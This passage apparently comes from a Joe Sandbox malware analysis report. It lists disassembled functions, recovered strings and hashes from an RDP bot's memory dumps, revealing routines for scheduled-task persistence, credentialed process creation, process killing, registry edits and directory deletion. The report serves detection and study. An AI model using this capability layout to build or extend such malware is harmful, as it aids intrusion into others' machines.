                  • Instruction Fuzzy Hash: 0631AE71A0CE0292E7619B6BA8501B8779AAF557B4F0403BADD7E472F1DF3CE4458701
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID:
                  • String ID: (data != NULL)$(len > 0)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$crc32
                  • API String ID: 0-3120737415
                  • Opcode ID: 491487d1d1b4d65f7a5c18aebf8645bc589bc03c6df1c50bbc29b2e00b29fdc1
                  • Instruction ID: 6a50ae30ebc6baef3d5c26373cefff38024a8fa26f666ede778257182f28b474
                  • Opcode Fuzzy Hash: 491487d1d1b4d65f7a5c18aebf8645bc589bc03c6df1c50bbc29b2e00b29fdc1
                  • Instruction Fuzzy Hash: D2113D61948B47C9FA11FB1498003F8B761FF46395FE055F6D64D96290CF3CA60AD360
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: _errno$fclosefflushfopenfseekfwrite
                  • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                  • API String ID: 2897271634-4162578512
                  • Opcode ID: cd132c142f990a62bbc12e9281bf62bd62eb44cea42565142062870364d5400f
                  • Instruction ID: 5c28f5299b9105f52bfbe53882652c2d6da6fea10166c45b5c154f2595d52ead
                  • Opcode Fuzzy Hash: cd132c142f990a62bbc12e9281bf62bd62eb44cea42565142062870364d5400f
                  • Instruction Fuzzy Hash: 90D1AE62A08E4392FB129B97E8403BC3B5AAF507B5F8555BAD90E472B4DF3CE585C300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                  • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$H:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                  • API String ID: 1842180197-931256089
                  • Opcode ID: 54da3503b8f84a4a9f5f477847c2ca6ad28ea6d9660acc4c70a60580022221a9
                  • Instruction ID: cec5c6d1e4ee9073eaca114ed46201a46ec6b20e8a5f42f76386a11994361911
                  • Opcode Fuzzy Hash: 54da3503b8f84a4a9f5f477847c2ca6ad28ea6d9660acc4c70a60580022221a9
                  • Instruction Fuzzy Hash: 81126FA590CF4381FB718B87E4403BD6399BB417A4F4401FADA4E466B4DF7CEA898701
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$Process$CloseHandleOpenTerminatestrcmp
                  • String ID: $ $(name != NULL) || (pid != 0)$H:/Projects/rdp/bot/codebase/process.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~
                  • API String ID: 2412365107-3098527327
                  • Opcode ID: 81c63815267f0c9c9996e2803d3dcf8c8ea940cf10da9261f995aa4587534c24
                  • Instruction ID: 01693aef6b8132d6589491a053864fa4c5c485169682d7e1d027d2083ac98f33
                  • Opcode Fuzzy Hash: 81c63815267f0c9c9996e2803d3dcf8c8ea940cf10da9261f995aa4587534c24
                  • Instruction Fuzzy Hash: 86F16A59E0CE0386FB755F97A4C037D124DAF14375E6404BACA0E4A2F6EE6EAD849302
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen$strncpy$DeleteFilestrcat
                  • String ID: Context$"><Exec>$%TEMP%$(config_path != NULL)$/create$/tn$/xml$</Comman$<Actions$<Exec><C$="Author$></Actio$H:/Projects/rdp/bot/program-manager/schtasks.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(config_path=%s,err=%08x)$[I] (%s) -> Done(config_path=%s)$d></Exec$h$ns></Tas$ommand>$schtasks.exe$schtasks_create$sk>
                  • API String ID: 329028095-661211825
                  • Opcode ID: 9d2b95ecedeef79ef940029952d43e491f4449009400689515876598c96c059c
                  • Instruction ID: 4ee89550025b6e8517ccb58e7ec47c4f1aa68b4bf3789db0836dce61f2513890
                  • Opcode Fuzzy Hash: 9d2b95ecedeef79ef940029952d43e491f4449009400689515876598c96c059c
                  • Instruction Fuzzy Hash: 42A1AF72A08F8782EB218B56E4503EE7799EB84794F804179DA4D477B5EF7CD609CB00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen$_mbscat_mbscpy$strcmp
                  • String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                  • API String ID: 4213218670-1088979775
                  • Opcode ID: 43c909b6f149e1d1df8258286fda8d50e1f0b48b3360d2dda5985ab33cba4aca
                  • Instruction ID: d1aaa01238ba030b176c8042fd930fbcc90692fe95d43322cfa8d68e34173347
                  • Opcode Fuzzy Hash: 43c909b6f149e1d1df8258286fda8d50e1f0b48b3360d2dda5985ab33cba4aca
                  • Instruction Fuzzy Hash: 0CC1B261A0C782D5FA20A725A4847FBE652AB853C8FF400BADA4DC76C9DF7CE505C720
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen
                  • String ID: %TEMP%$(entry != NULL)$(package != NULL)$(strlen(entry) <= 0xff)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed to read the entry file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed to read the package file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed(package=%s,entry=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(package=%s,entry=%s)$mem_alloc$package_pack
                  • API String ID: 39653677-2518748746
                  • Opcode ID: 6464d3d9d7d0ee37c4e9d6bf35cab73f2c3b7019d297de13f51eb0007bd82d43
                  • Instruction ID: 2ee85edd6082564a9ba6e79e97d2d0b05caf152225bed5c1f2578a7981ee11e7
                  • Opcode Fuzzy Hash: 6464d3d9d7d0ee37c4e9d6bf35cab73f2c3b7019d297de13f51eb0007bd82d43
                  • Instruction Fuzzy Hash: 67C16E61A0CB46D6FA51BB15E4403BAF761BB447C8FE040B9EA4D87695EF3CE909C720
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen$DirectoryErrorLastRemove_mbscpystrcmp$fflushfwrite
                  • String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                  • API String ID: 1390976747-812936415
                  • Opcode ID: 244a59a808a88d46dd88935c991242beef01adb72226dff1f40ab65060197119
                  • Instruction ID: a87375f0420ce9b34f78c6259f4d49a76c9533fa49b9299f7762c09e3d6dad23
                  • Opcode Fuzzy Hash: 244a59a808a88d46dd88935c991242beef01adb72226dff1f40ab65060197119
                  • Instruction Fuzzy Hash: F0A1B121A0D782D5FB20BB1494443BAE3A1AF863C5FF440BAC64DC7695EF7CE9498720
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                  • String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                  • API String ID: 2460052984-812936415
                  • Opcode ID: 00ae393095fadf1139cbb586ec39620cd26178d760d8a9428a3a12c53d054faa
                  • Instruction ID: 0e53b61afe8425d82f9d1b27b0f3251cb2f4610c73cc3940f41634f63fdbe6ad
                  • Opcode Fuzzy Hash: 00ae393095fadf1139cbb586ec39620cd26178d760d8a9428a3a12c53d054faa
                  • Instruction Fuzzy Hash: 15A1E561A1CF8382F7218B97E4443FD635AAF813A8F9400BAD94D476B5DF7CE5498B01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen$strcatstrcpy$strcmp
                  • String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                  • API String ID: 2140730755-1088979775
                  • Opcode ID: 6415cd7427ca7030dcfbccfaa3fa58744746782daadf4cd84f294226e7070e12
                  • Instruction ID: 12551726f46f41d2cb3f1b3a0a5e37315d5ed9a129a71dca8f2eff98402c686f
                  • Opcode Fuzzy Hash: 6415cd7427ca7030dcfbccfaa3fa58744746782daadf4cd84f294226e7070e12
                  • Instruction Fuzzy Hash: DFC1F561A1CE83C1FB218B57A5803FD635AAF453A8F9440BADA4D076B5DF7CE549C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateHandleLock
                  • String ID: $ $(lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$~$~
                  • API String ID: 2747014929-2799703827
                  • Opcode ID: 8a1f087a5b44e938cbc2bf28125e5d566350832f0ac745bc4e0023e973acce87
                  • Instruction ID: df8e594e3bdffa7b6b7ae2adee9756336d6deaa07bd49c41441bbb561d443b08
                  • Opcode Fuzzy Hash: 8a1f087a5b44e938cbc2bf28125e5d566350832f0ac745bc4e0023e973acce87
                  • Instruction Fuzzy Hash: D7816750D0CF4B82F771AB96E44037C325A5F01378F6441BAC96E076F2EE6DA9858362
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: CloseOpenValuefflushfwrite
                  • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 716145365-253406552
                  • Opcode ID: 72523dd42ad8032fe4d7ddf1207920d9eb1ce3ee780bd0d66baf9405c105d9d5
                  • Instruction ID: 90e239d36146312105d82005ff5d2d01042678725c91c4225b1a75b167c4cc9c
                  • Opcode Fuzzy Hash: 72523dd42ad8032fe4d7ddf1207920d9eb1ce3ee780bd0d66baf9405c105d9d5
                  • Instruction Fuzzy Hash: DF81842194C70BC5FA707B11A840379F260AF517C4EF440BADB5EC6A91EFADA9C5C362
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: CloseDeleteOpenValuefflushfwrite
                  • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 3240087161-1648311886
                  • Opcode ID: a973ef9243e36e095b25bd4e1a67da37fb8b2c772661af791121efe8287293ef
                  • Instruction ID: 6e02f5e7eeb07416bbf5c710fe3562f745502ec6a27be4c7bbcb6b236b4cc059
                  • Opcode Fuzzy Hash: a973ef9243e36e095b25bd4e1a67da37fb8b2c772661af791121efe8287293ef
                  • Instruction Fuzzy Hash: BE817D2590C70BC5FA35B744A848378F290AF117C4FF481BBD95EC6AA5EE6DAD84C321
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwrite
                  • String ID: (hnd != NULL)$(sid != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                  • API String ID: 1151404744-2809655389
                  • Opcode ID: aea9e89bfe65d953c02a92a976238f55aba443553f75ec613a9a8551a8e7671e
                  • Instruction ID: 4ec61628e594098d26f4a72175dd2d27ff9b773340eeb05ec38620ed8bdf58e2
                  • Opcode Fuzzy Hash: aea9e89bfe65d953c02a92a976238f55aba443553f75ec613a9a8551a8e7671e
                  • Instruction Fuzzy Hash: 3491786AE0CD0381FB615F9BE4C03BD125AAF90774F2904BAD94E476B4DE3CE9858302
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: _errno$fclosefopenfwrite
                  • String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                  • API String ID: 608220805-961576452
                  • Opcode ID: 48d1972d550d396858ed4610e95cde024ad71582133a9006027b6594f555b4eb
                  • Instruction ID: f5f2d827a92ec28deba3b1627b1285c6a1a47ce069a2d95cc2e0246e815b2383
                  • Opcode Fuzzy Hash: 48d1972d550d396858ed4610e95cde024ad71582133a9006027b6594f555b4eb
                  • Instruction Fuzzy Hash: 4B517261A08E4392FB11AB97E9402BD3B5ABF407B5F5855B6D90D472B4EF3CE506C300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen$CreateDirectoryErrorLast$_mbscpy
